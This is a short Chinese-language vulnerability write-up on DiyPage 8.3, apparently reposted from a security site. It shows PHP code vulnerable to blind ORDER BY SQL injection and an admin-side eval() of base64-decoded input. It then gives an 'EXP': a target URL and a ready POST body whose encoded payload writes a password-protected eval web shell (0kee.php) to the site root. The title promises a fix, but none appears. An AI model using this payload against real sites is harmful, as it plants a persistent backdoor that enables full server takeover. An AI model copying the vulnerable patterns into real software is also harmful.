DiyPage8.3 orderby注入和代码执行漏洞及修复 - 网站

 

mod\dpcms\js\searchsubmit.php

第36行

 

 

$srchorder= $_GET['srchorder'] ? $_GET['srchorder'] : 'eid';

 

 

第52行

 

 

        $sql='SELECT eid,builddate,title,author,content';

        $sql.=' FROM '.DP_DBPREFIX.'cms_entry WHERE active=1 AND';

        。。。。。。

        。。。。。。。。。。。

               $sql.=' ORDER BY '.$srchorder.' '.$ascdesc;

        $sql.=' LIMIT '.$offset.','.$srchtotal;

        $query=$db->query($sql);

 

 

猪肉点在order by后面  又无错误回显  只能盲注

 

 

二、后台代码执行

这是个类似于后门的洞子  但到底是不是   不敢断言

mod\spider\cp\rule_import.php第8行

 

 

if ($_POST['issubmit']==true) {

        $importarray=array();

        eval(b64($_POST['rulestr']));

 

 

下面是inc\func.php 里的b64函数

 

 

function b64($str,$encode=false) {

        if ($encode) {

                return '[b64]'.base64_encode($str);

        }else{

                if (substr($str,0,5)=='{b64}' or substr($str,0,5)=='[b64]') {

                        return base64_decode(str_replace(array('{b64}','[b64]'),'',$str));

                }else{

                        return $str;

                }

        }

}

 

 

EXP：进后台后

 

 

http://www.2cto.com /admin.php?mod=modcp&formod=spider&item=ruleadm&do=import

提交以下POST包至此

issubmit=true&rulestr=[b64]JGZwID0gZm9wZW4oIjBrZWUucGhwIiwgInciKTtmd3JpdGUoJGZwLCAiPD9ldmFsKFwkX1BPU1RbMGtlZV0pOz8+Iik7ZmNsb3NlKCRmcCk7

根目录下生成0kee.php  密码0kee

查看更多关于DiyPage8.3 orderby注入和代码执行漏洞及修复 - 网站的详细内容...